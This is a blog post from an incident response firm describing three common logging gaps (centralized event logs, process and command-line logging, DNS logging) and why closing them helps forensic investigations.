The Top 3 Logging Gaps We See During Incident Response

Mar 24

For DFIR investigations at Venator Cyber Operations Group, there are a few logging gaps that repeatedly slow our investigators down or completely prevent answering key questions (initial access, lateral movement, data access, data exfiltration, etc.). Based on small or medium business environments and what we see most often in investigations, these are the top 3 logging gaps.

1. No Centralized Windows Event Log Collection

One of the last things an attacker does is clear logs or overwrite them on the device they conduct actions on. This happens on network devices like switches and routers, but especially on endpoints. Without centralized collection you lose lateral movement visibility and the investigation has to rely mostly on network based telemetry or deeper endpoint forensics that might not paint a clear picture beyond “this malicious file existed at this time” or “the user navigated to this folder, but we can’t be certain this file was exfiltrated”.

Furthermore, many organizations that do centralize logs keep those logs for less than 7 days, however, incident response usually starts weeks later. By the time suspicious activity is detected, reported, and escalated to responders, the initial evidence may already be gone. This gap between log retention and investigation start time can severely hinder forensic analysis. In many real-world incidents, attackers maintain access to a network for weeks or months before detection. This period- often referred to as dwell time- allows adversaries to move laterally, escalate privileges, and establish persistence before anyone notices. For this reason, most DFIR and security operations best practices recommend significantly longer log retention periods. A common baseline is 30 days minimum for hot searchable logs, 90–180 days in a centralized storage solution for security investigations, 1 year or longer for compliance, threat hunting, and legal needs.

Host, network, networking devices, and cloud logs can be forwarded to a central logging platform such as a SIEM or log aggregation system like Splunk, Elastic Stack, or Microsoft Sentinel. A relatively inexpensive way for organizations to gain visibility into network communications—especially when they lack full packet capture or advanced network detection tools—is to enable NetFlow or flow-based telemetry on routers and switches and forward that data to a centralized collector. Flow logging provides a summary of network conversations, allowing analysts to understand how systems communicate across the network without capturing the full contents of every packet. Similarly, network security monitoring tools can extract useful metadata from network traffic without requiring full packet capture. One common example is Zeek, which analyzes network traffic and generates structured logs containing key information about network traffic. Network traffic for monitoring tools can be obtained in several ways, but two of the most common methods are Switch Port Analyzer (SPAN) ports and network taps. Both approaches allow security monitoring tools—such as Zeek or Suricata—to observe network traffic without directly interfering with the normal flow of data across the network.

2. No Process Creation Logging and Context

Many business environments don’t enable enhanced process logging, which significantly reduces visibility during incident response. Windows can log process creation events, but it does not do so unless auditing is enabled. Furthermore, without more logging configuration, investigators only see limited information such as the process name and basic metadata.

For example,after enabling process creation logging, the default Windows Security Event Log may record a process creation event (Event ID 4688), but unless command line logging is enabled, it only shows the executable that ran (e.g., powershell.exe or cmd.exe). This creates a major blind spot because many legitimate administrative tools are frequently abused by attackers. Simply knowing that powershell.exe executed is rarely useful by itself- administrators and automated tools run PowerShell constantly in normal environments. The critical information investigators need is the command line arguments used to launch the process. Command-line parameters reveal what the process actually did. Beyond only command line logging, PowerShell Script Block Logging is incredibly powerful because it records the actual PowerShell code execution, even when obfuscated which is commonly employed by threat actors to bypass most basic Anti-Virus.

In most enterprise environments this is configured from the Domain Controller using Group Policy. On personal computers, these settings are enabled in the Windows Registry directory HKLM\Software\Microsoft\Windows.

3. Missing DNS Logging

Many organizations focus heavily on firewall logging, capturing information such as source IP, destination IP, ports, and allowed or blocked connections. While this data is useful for understanding network communication patterns, it often does not provide visibility into the DNS queries that preceded those connections. As a result, analysts can see that a host communicated with an IP address, but they cannot determine which domain name the system attempted to resolve before making that connection.

One major use of DNS by attackers is command-and-control (C2) communication. Malware typically contacts a domain name controlled by the attacker to retrieve instructions or send status updates. Even if the actual network connection is encrypted or uses common protocols like HTTPS, the initial DNS lookup can reveal the domain associated with the attacker infrastructure. For example, malware might resolve a domain such as update-service-check[.]com before connecting to the attacker’s server. Without DNS logs, investigators may only see an outbound connection to an IP address, making it much harder to identify that the traffic was malicious.

Also, DNS is also commonly used in Domain Generation Algorithms (DGAs). Some malware families dynamically generate hundreds or thousands of potential domain names each day and attempt to resolve them until one successfully connects to the attacker’s infrastructure. DNS logs can reveal this behavior because the infected host will produce a large number of failed or unusual domain lookups. For example, a system might attempt to resolve domains such as kjsdf83hj[.]com, lkdjf92sd[.]net, and asjdf83kdl[.]org in rapid succession. This pattern is a strong indicator of DGA-based malware activity, but it is only visible if DNS queries are recorded.

Another technique attackers use is DNS tunneling, where DNS queries and responses are abused to carry data. Because DNS traffic is almost always allowed through firewalls, attackers can encode information within DNS requests to bypass traditional network security controls. For instance, malware might send encoded data within subdomains such as datachunk1[.]attacker-domain.com, datachunk2[.]attacker-domain.com, and so on.

When DNS logging is not enabled, investigators lose the ability to answer some of the most important questions during an incident response investigation. For example, they may not be able to determine what domains a compromised host attempted to resolve, which domains were associated with attacker infrastructure, or whether a system was repeatedly attempting to contact suspicious domains over time.

If the organization uses Active Directory–integrated DNS, the internal DNS servers can log queries. Many organizations use security platforms that already log DNS queries such as Palo Alto Networks, Cisco Systems, and Fortinet. However, If you rely on these edge devices only, and most systems utilize segmented internal DNS resolvers, this will be less effective and a multi-pronged approach may be required to collect queries to internal and external resolvers. For personal computers, DNS activity can also be logged directly with Sysmon which ties process name to process ID to user context.

Conclusion

In DFIR engagements, the difference between a clear, defensible timeline and an incomplete or inconclusive investigation often comes down to logging. Across small and medium business environments, the same gaps continue to surface- lack of centralized log collection, insufficient process visibility, and missing DNS telemetry. Individually, each of these gaps introduces blind spots. Together, they significantly limit an investigator’s ability to determine how an attacker gained access, what actions were taken, and whether data was accessed or exfiltrated.

Without centralized logging, critical evidence is often lost before an investigation even begins. Without detailed process creation and command-line visibility, attacker activity blends in with legitimate administrative behavior. Without DNS logging, investigators lose one of the most reliable indicators of malicious infrastructure and command-and-control activity. These are not edge cases—they are the most common points of failure we encounter in real-world investigations.

Addressing these gaps does not require overly complex or expensive solutions. Establishing centralized log aggregation with appropriate retention, enabling enhanced process and PowerShell logging, and capturing DNS queries across both internal and external resolvers provide immediate and measurable improvements in visibility. These controls allow organizations to move from reactive guesswork to evidence-driven investigations.

At Venator Cyber Operations Group, we consistently see that organizations with these foundational logging capabilities in place are able to respond faster, answer critical questions with confidence, and reduce overall impact during an incident. Logging is not just a compliance requirement—it is the backbone of effective incident response.

Sam Rothlisberger

The Top 3 Logging Gaps We See During Incident Response

1. No Centralized Windows Event Log Collection

2. No Process Creation Logging and Context

3. Missing DNS Logging

Conclusion

The Role of Digital Forensics in Criminal Defense

Why MFA is Important